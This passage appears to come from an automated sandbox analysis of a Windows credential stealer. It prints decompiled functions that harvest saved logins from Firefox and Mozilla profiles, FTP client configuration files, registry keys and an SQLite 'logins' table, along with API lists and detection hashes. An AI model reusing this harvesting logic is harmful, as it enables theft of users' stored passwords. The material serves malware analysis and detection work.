                                                                        									E00401823(_t45, _t51, _v12);
                                                                        									GlobalUnlock(_v16);
                                                                        									_push(_v12);
                                                                        									_pop( *__eax);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					E00401019(E004017D5(), _t53, _v8);
                                                                        					goto L12;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B
                                                                          • Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        • GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
                                                                        • GlobalLock.KERNEL32 ref: 004027E9
                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                          • Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                          • Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Globallstrlen$Streamlstrcatlstrcpy$CreateFromLockPathTempUnlock
                                                                        • String ID: Software\WinRAR
                                                                        • API String ID: 2423343858-224198155
                                                                        • Opcode ID: 3391d8feb5a8d5462d63242a6ec9611df74648ce9e8382b5ac25b7fc276f6611
                                                                        • Instruction ID: 7478491bfa33174de51c22f170f017b73afdc2e34cee783fbd344f0ac75d9f77
                                                                        • Opcode Fuzzy Hash: 3391d8feb5a8d5462d63242a6ec9611df74648ce9e8382b5ac25b7fc276f6611
                                                                        • Instruction Fuzzy Hash: 3C212F76A00109BADF05BBE1CD4A9DDBA7DEF44358F108177B600B20E1E6BD8A949B58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004045ED(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				int _v2072;
                                                                        				char _v2076;
                                                                        				long _t31;
                                                                        				long _t32;
                                                                        				intOrPtr _t44;
                                                                        
                                                                        				_t31 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t32 = _t31;
                                                                        				if(_t32 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_v2072 == 1 || _v2072 == 7) {
                                                                        							if(StrStrIA( &_v2064, "Line") == 0) {
                                                                        								L13:
                                                                        								_v12 = _v12 + 1;
                                                                        								continue;
                                                                        							}
                                                                        							_t44 = E00401C8E( *0x4140fe, _a8,  &_v2064,  &_v2076);
                                                                        							if(_t44 == 0) {
                                                                        								goto L13;
                                                                        							}
                                                                        							_v2068 = _t44;
                                                                        							E00401486(_a4, 0xbeef0001);
                                                                        							if(_v2072 != 1) {
                                                                        								E00401486(_a4, 1);
                                                                        							} else {
                                                                        								E00401486(_a4, 0);
                                                                        							}
                                                                        							E004014BC(_a4, _v2068, _v2076);
                                                                        							E004017D5(_v2068);
                                                                        							goto L13;
                                                                        						} else {
                                                                        							_v12 = _v12 + 1;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t32;
                                                                        			}













                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404603
                                                                        • RegEnumValueA.ADVAPI32 ref: 0040463C
                                                                        • StrStrIA.SHLWAPI(?,Line), ref: 0040466D
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 004046F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpenValue
                                                                        • String ID: Line
                                                                        • API String ID: 4012628704-1898322888
                                                                        • Opcode ID: 4bc0c0cf891e73b42a3f2e34f116057a73adb986859bb762e80a9a6402df02bf
                                                                        • Instruction ID: 7fcf9f9aae3f6b2ea9e0e0dabca749cb460151442f66bdead352d5342de98d71
                                                                        • Opcode Fuzzy Hash: 4bc0c0cf891e73b42a3f2e34f116057a73adb986859bb762e80a9a6402df02bf
                                                                        • Instruction Fuzzy Hash: EF211C7180011CBADF219B91CC41BED7BB9BF41304F0484B6B644B11A1EB7E9F959F99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040E3E5(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				char* _v2068;
                                                                        				int _v2072;
                                                                        				char _v2076;
                                                                        				long _t27;
                                                                        				long _t28;
                                                                        				char* _t37;
                                                                        				void* _t43;
                                                                        
                                                                        				_t43 = __ecx;
                                                                        				_t27 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t28 = _t27;
                                                                        				if(_t28 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _v2072 - 1;
                                                                        						if(_v2072 == 1) {
                                                                        							_t37 = E00401C8E(_a4, _a8,  &_v2064,  &_v2076);
                                                                        							__eflags = _t37;
                                                                        							if(_t37 == 0) {
                                                                        								L10:
                                                                        								_v12 = _v12 + 1;
                                                                        								continue;
                                                                        							}
                                                                        							_v2068 = _t37;
                                                                        							__eflags = StrStrIA(_v2068, ".wjf");
                                                                        							if(__eflags != 0) {
                                                                        								E0040E163(_t43, __eflags, _a12, _v2068);
                                                                        							}
                                                                        							E004017D5(_v2068);
                                                                        							goto L10;
                                                                        						}
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t28;
                                                                        			}















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E3F8
                                                                        • RegEnumValueA.ADVAPI32 ref: 0040E431
                                                                        • StrStrIA.SHLWAPI(?,.wjf,00000000,000007FF,?,?), ref: 0040E478
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E4A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpenValue
                                                                        • String ID: .wjf
                                                                        • API String ID: 4012628704-198459012
                                                                        • Opcode ID: c83530f97f56f3b4375d12b3fb4e0442e6c1c0cb1499dd27e9528eb1518b1955
                                                                        • Instruction ID: 2985ecba4934f64bc87a956b145e7b99f857eac3f65c13796da90851c2a9d639
                                                                        • Opcode Fuzzy Hash: c83530f97f56f3b4375d12b3fb4e0442e6c1c0cb1499dd27e9528eb1518b1955
                                                                        • Instruction Fuzzy Hash: 0211FC7291010CAADF119B92CC41BEDBBB9BF00304F0484B6A514B41A1DB799EA6AF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E0040434C(void* __ecx, void* __edx) {
                                                                        				signed char _v5;
                                                                        				signed char _v6;
                                                                        				signed char _v7;
                                                                        				signed char _v8;
                                                                        				signed char _v9;
                                                                        				signed char _v10;
                                                                        				signed char _v11;
                                                                        				signed char _v12;
                                                                        				signed short _v14;
                                                                        				signed short _v16;
                                                                        				char _v20;
                                                                        				char _v120;
                                                                        				char _v124;
                                                                        				void* _t19;
                                                                        				char* _t21;
                                                                        
                                                                        				_t19 = E00402725(__ecx, __edx, "HWID",  &_v124); // executed
                                                                        				_push(_t19);
                                                                        				if(_t19 == 0 || _v124 <= 0x14) {
                                                                        					_t21 =  &_v20;
                                                                        					_push(_t21);
                                                                        					L00410DC4();
                                                                        					if(_t21 >= 0) {
                                                                        						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
                                                                        						E0040260B("HWID",  &_v120, lstrlenA( &_v120)); // executed
                                                                        					}
                                                                        				}
                                                                        				return E004017D5();
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00402725: GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B
                                                                          • Part of subcall function 00402725: GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
                                                                          • Part of subcall function 00402725: GlobalLock.KERNEL32 ref: 004027E9
                                                                          • Part of subcall function 00402725: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B
                                                                        • CoCreateGuid.OLE32(?,00000000,HWID,?), ref: 0040436F
                                                                        • wsprintfA.USER32 ref: 004043B6
                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,HWID,?), ref: 004043C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                                                        • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                        • API String ID: 1852535927-1100116640
                                                                        • Opcode ID: 7c1486808c2ee149e2a97c7e0c132aac0d5a753c27695d7137dc8f06e4236a6f
                                                                        • Instruction ID: 0e75cfa17dfb2f7b8333cb936f596bb44a555b5fa009e7f621812bee52e14eac
                                                                        • Opcode Fuzzy Hash: 7c1486808c2ee149e2a97c7e0c132aac0d5a753c27695d7137dc8f06e4236a6f
                                                                        • Instruction Fuzzy Hash: 9C113CA690419D7DCB61E2F64D06DFFBAFC590C605B1400A7B6A0E20C2E67D97409B38
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409996(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x24, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004099C4
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409A09
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                                        • API String ID: 3062143572-2631691096
                                                                        • Opcode ID: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
                                                                        • Instruction ID: ee68b02c4fe34adabb2d5b7da2459322c65d04647a6db10db078e7f2ecd853e2
                                                                        • Opcode Fuzzy Hash: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
                                                                        • Instruction Fuzzy Hash: 96F01231540608FEDF11BF91CC47FC93B659B84748F108076B609B51E2E7B95AE09A5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409BE1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x28, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\");
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C0F
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409C54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                                        • API String ID: 3062143572-2716603926
                                                                        • Opcode ID: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
                                                                        • Instruction ID: bbdd13b51472c6f4fc299ffa726447a69ce41118111f745e7b4f7d92f38d9e6c
                                                                        • Opcode Fuzzy Hash: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
                                                                        • Instruction Fuzzy Hash: 5AF0627055060CFADB51BFA1CD03FC93A659B94784F108036B604741F2DAB94AD09B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040CABE(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t20;
                                                                        				void* _t29;
                                                                        				char* _t30;
                                                                        
                                                                        				_t29 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x42, 0);
                                                                        				_t30 =  *0x414082; // 0x0
                                                                        				if( *_t30 == 0) {
                                                                        					L5:
                                                                        					_t10 = E00401DCE(_t34, 0x23);
                                                                        					_t35 = _t10;
                                                                        					if(_t10 != 0) {
                                                                        						E00404131(_a4, E00401D69(_t10, "\\3D-FTP"), "sites.ini", 0xbeef0000); // executed
                                                                        						E004017D5(_t17);
                                                                        					}
                                                                        					_t12 = E00401DCE(_t35, 0x23);
                                                                        					_t36 = _t12;
                                                                        					if(_t12 != 0) {
                                                                        						E00404131(_a4, E00401D69(_t12, "\\SiteDesigner"), "sites.ini", 0xbeef0000); // executed
                                                                        						E004017D5(_t14);
                                                                        					}
                                                                        					return E00401553(_t29, _t36, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t20 = StrStrIA(_t30, "3D-FTP");
                                                                        					_t32 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						_t24 = E0040234A(_t32, _t30);
                                                                        						if(E0040234A(_t32, _t30) != 0) {
                                                                        							E00404131(_a4, _t24, "sites.ini", 0xbeef0000);
                                                                        							E004017D5(_t24);
                                                                        						}
                                                                        					}
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        					_t34 =  *_t30;
                                                                        				} while ( *_t30 != 0);
                                                                        				goto L5;
                                                                        			}










                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,3D-FTP), ref: 0040CAE5
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                                                                        • API String ID: 1884169789-4074339522
                                                                        • Opcode ID: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
                                                                        • Instruction ID: c21e1b23b53f1c1b31708c1f6647b193aba12693f6123f211595877f46f97cb5
                                                                        • Opcode Fuzzy Hash: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
                                                                        • Instruction Fuzzy Hash: 2711C1B0A40205B9EB1137769C47FAF397E4F80754F24013B7951B55E2DA7CAE8086AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040AB27(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v20;
                                                                        				char _v2068;
                                                                        				char _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				long _t36;
                                                                        				long _t37;
                                                                        
                                                                        				_t36 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t37 = _t36;
                                                                        				if(_t37 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2076 = E00401D15(E00401D15(_a8, "\\"),  &_v2068);
                                                                        						E004017D5(_t42);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2076, "SiteServers",  &_v20);
                                                                        						__eflags = _v2072;
                                                                        						if(_v2072 == 0) {
                                                                        							L12:
                                                                        							E004017D5(_v2072);
                                                                        							E0040AB27(_a4, _v2076);
                                                                        							E004017D5(_v2076);
                                                                        							_v12 = _v12 + 1;
                                                                        							continue;
                                                                        						}
                                                                        						__eflags = _v20 - 4;
                                                                        						if(_v20 != 4) {
                                                                        							L11:
                                                                        							E004017D5(_v2072);
                                                                        							goto L12;
                                                                        						}
                                                                        						 *_t18 =  *_v2072;
                                                                        						__eflags = _v2072 - 0x3e8;
                                                                        						if(_v2072 > 0x3e8) {
                                                                        							_v2072 = 0x3e8;
                                                                        						}
                                                                        						while(1) {
                                                                        							__eflags = _v2072;
                                                                        							if(_v2072 == 0) {
                                                                        								goto L11;
                                                                        							}
                                                                        							_t21 =  &_v2072;
                                                                        							 *_t21 = _v2072 - 1;
                                                                        							__eflags =  *_t21;
                                                                        							E0040A88E( *_t21, _a4, _v2076, _v2072);
                                                                        						}
                                                                        						goto L11;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t37;
                                                                        			}













                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AB3D
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040AB71
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AC59
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A8FA
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A90D
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A920
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A933
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A946
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A959
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A96C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wsprintf$CloseEnumOpen
                                                                        • String ID: SiteServers
                                                                        • API String ID: 1693054222-2402683488
                                                                        • Opcode ID: 0ef5523177a024c00f5b0ed3b398ae05ceb2a5ae07cf5ce938f1a288baa9aaa3
                                                                        • Instruction ID: 47a2a2c135a91701639e8d1277b6cd8de78c57ea59644ea58835ceb1dfa6f9dd
                                                                        • Opcode Fuzzy Hash: 0ef5523177a024c00f5b0ed3b398ae05ceb2a5ae07cf5ce938f1a288baa9aaa3
                                                                        • Instruction Fuzzy Hash: E831FA7190021CEBDF21AB91CC42BDDBAB9BF04304F14C0B6A244711A1DF795AE29F9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408B58(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				long _t28;
                                                                        				long _t29;
                                                                        
                                                                        				_t28 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t29 = _t28;
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t34);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "MRU", 0);
                                                                        						if(_v2072 != 0) {
                                                                        							E00403E23(_a4, _v2072, 0xbeef0001);
                                                                        						}
                                                                        						E004017D5(_v2072);
                                                                        						E00408B58(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t29;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00408B9F
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: MRU
                                                                        • API String ID: 1332880857-344939820
                                                                        • Opcode ID: 2c9fd839f1fde82f146f6de45b00de2ca6f82928b52d003cb65db27dc92a9c4f
                                                                        • Instruction ID: dcb6cee7c3816d4270223188b258d8c916240f5df257d018843d2a4017f96bff
                                                                        • Opcode Fuzzy Hash: 2c9fd839f1fde82f146f6de45b00de2ca6f82928b52d003cb65db27dc92a9c4f
                                                                        • Instruction Fuzzy Hash: C321277190010CBADF21AFA1CD02FDD7BB9BF04304F1080BAB655B51A1DFB99A919F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040BC01(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				int _t35;
                                                                        				void* _t52;
                                                                        
                                                                        				if(_a16 == 5) {
                                                                        					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
                                                                        					if(_v12 == 1) {
                                                                        						_push(_v16);
                                                                        						_pop( *_t8);
                                                                        						_t35 = lstrcmpiA(_v20, "logins");
                                                                        						if(_t35 == 0) {
                                                                        							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
                                                                        							if(_v12 == 1) {
                                                                        								_t35 = lstrcmpA("table", _v16);
                                                                        								if(_t35 == 0) {
                                                                        									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
                                                                        									if(_v12 == 0) {
                                                                        										 *_t22 =  *_v16;
                                                                        										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
                                                                        										if(_v12 == 1) {
                                                                        											 *0x41914c = 0xffffffff;
                                                                        											 *0x419150 = 0xffffffff;
                                                                        											 *0x419154 = 0xffffffff;
                                                                        											_t35 = E0040B69A(_v16, E0040B973);
                                                                        											_v28 = 1;
                                                                        											if( *0x41914c != 0xffffffff &&  *0x419150 != 0xffffffff &&  *0x419154 != 0xffffffff) {
                                                                        												_t52 = E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BA2E); // executed
                                                                        												return _t52;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t35;
                                                                        			}












                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(00000000,logins,?), ref: 0040BC3F
                                                                        • lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BC74
                                                                          • Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA
